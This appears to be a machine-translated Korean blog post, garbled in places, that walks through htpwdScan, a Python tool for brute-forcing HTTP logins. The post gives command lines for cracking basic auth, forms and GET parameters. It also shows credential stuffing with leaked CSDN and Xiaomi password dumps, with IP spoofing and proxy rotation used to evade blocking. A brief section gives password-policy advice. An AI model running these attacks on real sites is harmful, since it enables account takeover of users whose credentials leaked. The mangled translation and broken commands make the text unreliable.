인터페이스 취약점

인터페이스 취약점

저자 : 왕 유양

시간 : 2019년 6월 7일

약한 암호

약한 암호 종종 큰 피해 약한 암호는 추측하거나 사람을 균열 암호 도구를 균열 일반적으로 쉽게 말합니다.

약한 암호 위험 :

  • 공격자는 쉽게 약한 암호 또는 시스템 관리 페이지에서 입력하고 궁극적으로 제어 권한의 목적을 달성 할 수
  • 당신은 약한 암호에 의해 사람의 친척의 계정 권한을 얻을 수 있습니다

데이터 보호 및 사실 약한 암호, 투명한 정보의 사용.

가장 일반적인 약한 암호 :

퍼즈 약한 암호 : HTTPS : //github.com/TheKingOfDuck/fuzzDicts

"+ 케이스 + 디지털 + 문자 기호"상대적으로 안전한 암호 정책 : 네트워크 전문가의 조언이다

일부 암호 제안 :

  1. 순수한 디지털 암호 정책 등 NA
  2. 암호 정책으로 간단한 디지털 논리 연속 정규, 문자, 기호의 조합을 사용하지 않고
  3. 암호는 최소 8이어야한다
  4. 정책의 네 가지 문자 유형
  5. 암호를 생략 컨텐츠 등 다른 이름을 포함하지 마십시오

인터페이스 취약점 : HTTP 암호 발파

htpwdScan : HTTP 폭파, 스크립트 라이브러리 충돌

htpwdScan : 서면 파이썬 HTTP 짐승을 기반으로, 공격 스크립트 라이브러리 충돌

  • 지원 배치 확인 및 수입 HTTP3 에이전트는 낮은 명중 라이브러리는 성공적으로 웹 애플리케이션 방화벽의 대부분을 우회 사이트의 대부분을 공격 할 수있다
  • 소셜 네트워크 라이브러리를 유출에 직접 액세스 라이브러리는 히트 공격을 개시
  • 큰 사전을 가져 오기위한 지원

htpwdScan의 간단한 예

  • HTTP 기본 인증

    htpwdScan.py -u = HTTP : //auth.58.com/ - 기본 User.txt를 password.txt를

    가져 오기 사용자 이름과 암호는 사전에

  • 양식 균열

    htpwdScan.py -f post2.txt -d 사용자 = User.txt를 passwd를 = password.txt를 -ERR = "성공"거짓 "

    post2.txt에서 가져 오기, User.txt를 password.txt를 암호 사전 파일을 저장 HTTP 패키지, 사용자를 붙잡고 passwd에 매개 변수를 해독 할 필요가있다

    성공 "거짓 실패 마커 선택, 태그는 큰 따옴표 경우, 슬래시와 함께 탈출을 기억하시기 바랍니다

  • 매개 변수 균열 GET

    htpwdScan.py -d passwd를 = password.txt를 -u = "http://xxx.com/index.php?m=login&username=test&passwd=test"-get -ERR = "성공"거짓 "

    여기에 스크립트가 알려줍니다 -get 매개 변수를 사용하는 것은 GET 요청입니다

  • 공격 히트 라이브러리

    "\ S + (\ S +) (\ S +)"-ERR = -fip htpwdScan.py = -f post.txt -database 로그인 명, passwd를 xiaomi.txt -regex = = "사용자 이름과 패스워드가 올바르지는"

    htpwdScan.py = -f post.txt -database passwd에, 로그인 명 = csdn.net.sql -regex = \ "를 S + # (\ S +) # (\ S +)은"-ERR = "사용자 이름과 패스워드가 올바르지"-fip

    CSDN 라이브러리를 사용 기장 및 출시 공격은 라이브러리를했다. 캡처 HTTP 요청 post.txt입니다

    -Regex 파라미터 설정 파라미터 (), 패킷 모드 호를 패킷을 요구 정규식의 파일로부터 추출된다

    기장 데이터 열 형식 [email protected] xxxxxxx, 즉(用户名)空白字符(密码)

    (\S+)\s+(\S+) 두 번째 충전이 passwd를 가지고 비어 있지 않은 동안, 공백이 아닌 문자 작성 걸릴 로그인 명을 지정할 수있다

    데이터 형식의 CSDN 행 zdg # 12344321 # [email protected]작성 긍정적 인 표현\S+ # (\S+) # (\S+)

    첫 번째 비어 있지 않은 문자열 # 작성 passwd를 한 후, 두 번째 충전 로그인 명 번호의 공백이 아닌 후

    주문 매개 변수가 중요합니다

    -fip 임의의 IP가 활성화 위조

  • HTTP 프록시 확인

    htpwdScan.py -f = post.txt -proxylist = proxies.txt -checkproxy -suc = "사용자 이름이나 암호가 잘못"

    사이트를 중단하려면 연결 대상 사이트, post.txt를 저장하는 HTTP 요청이 다음 -suc가 표시되어 통신 매개 변수를 설정 여부를 프록시 배치 테스트를 사용

    간단하고 실용적인 방법을 확인합니다 :

    htpwdScan.py -u = HTTP : //www.baidu.com -get -proxylist = available.txt -checkproxy -suc = "百度 一下"

전체 매개 변수 설명

스크립팅 지원 더 작은 기능, 인내는 아래 전체 지침을 읽어주십시오. 제안 된 멀티 사용 -debug이 문제가, 아무 문제가 다음 실제 균열을 시작하는 경우 매개 변수는 HTTP 요청을 볼 수 있습니다.

usage: htpwdScan.py [options]

* An HTTP weak pass scanner. By LiJieJie *

optional arguments:
  -h, --help            显示帮助

Target:
  -u REQUESTURL         设定目标URL, 示例.
                        -u="https://www.test.com/login.php"
  -f REQUESTFILE        从文件导入HTTP请求
  -https                当从文件导入HTTP请求时,启用https(SSL)
  -get                  使用GET方法,默认: POST
  -basic  [ ...]        HTTP Basic 暴力破解.
                        示例. -basic users.dic pass.dic

Dictionary:
  -d Param=DictFile [Param=DictFile ...]
                        为参数设定字典文件,
                        支持哈希函数如 md5, md5_16, sha1.
                        示例. -d user=users.dic pass=md5(pass.dic)

Detect:
  -no302                无视302跳转, 默认302敏感
  -err ERR [ERR ...]    响应文本的破解失败标记,
                        示例. -err "user not exist" "password wrong"
  -suc SUC [SUC ...]    响应文本中的破解成功标记,
                        e.g. -suc "welcome," "admin"
  -herr HERR            响应HTTP头的破解失败标记
  -hsuc HSUC            响应HTTP头的破解成功标记
  -rtxt RetryText       响应文本中的重试标记,出现则重试请求,
                        示例. -rtxt="IP blocked"
  -rntxt RetryNoText    响应文本中的重试标记,未出现则重试请求,
                        示例. -rntxt="<body>"
  -rheader RetryHeader  响应头中的重试标记,出现则重试请求,
                        示例. -rheader="Set-Cookie:"
  -rnheader RetryNoHeader
                        响应头中的重试标记,未出现则重试请求,
                        示例. -rheader="HTTP/1.1 200 OK"

Proxy and spoof:
  -proxy Server:Port    设定少量HTTP代理
                        示例. -proxy=127.0.0.1:8000,8.8.8.8:8000
  -proxylist ProxyListFile
                        从文件批量导入HTTP代理,
                        示例. -proxylist=proxys.txt
  -checkproxy           检查代理服务器的可用性.
                        可用代理输出到 001.proxy.servers.txt
  -fip                  生成随机X-Forwarded-For欺骗源IP
  -fsid FSID            生成随机session ID. 示例. -fsid PHPSESSID
  -sleep SECONDS        每次HTTP结束,等待SECONDS秒,
                        避免IP被临时屏蔽,进入黑名单

Database attack:
  -database DATABASE    导入社工库中的数据.
                        示例. -database user,pass=csdn.txt
  -regex REGEX          从社工库中提取数据的正则表达式,必须分组.
                        示例. -regex="(\S+)\s+(\S+)"

General:
  -t THREADS            工作线程数,默认50
  -o OUTPUT             输出文件.  默认: 000.Cracked.Passwords.txt
  -debug                进入debug模式检查HTTP请求和HTTP响应
  -nov                  只显示破解成功的条目,不显示进度
  -v                    show program's version number and exit

스크립트 설치 패키지 분석

린 디렉토리

  • cmdline.py : 무결성을 확인, 명령 줄 매개 변수를 구문 분석
  • console_width.py : 폭 컴퓨터 단말, 적응 출력
  • encodings.py : 플랫폼에 따라 부호화 및 복호화
  • proxy.py : 수입 HTTP 프록시
  • queue.py : 큐 사전 생성
  • request_fil.py : 텍스트 파일을 구문 분석하고 HTTP 요청 가져 오기를 구문 분석
  • request.py : 시작 HTTP 요청, HTTP 응답 결정 로직의 분석

DICT 디렉토리

  • 디렉토리는 암호 파일 디렉토리입니다

발파 암호 페이지 BurpSuite

  • 트림 소프트웨어는 무력을 사용할 수 있습니다

추천

출처www.cnblogs.com/wangyuyang1016/p/10988841.html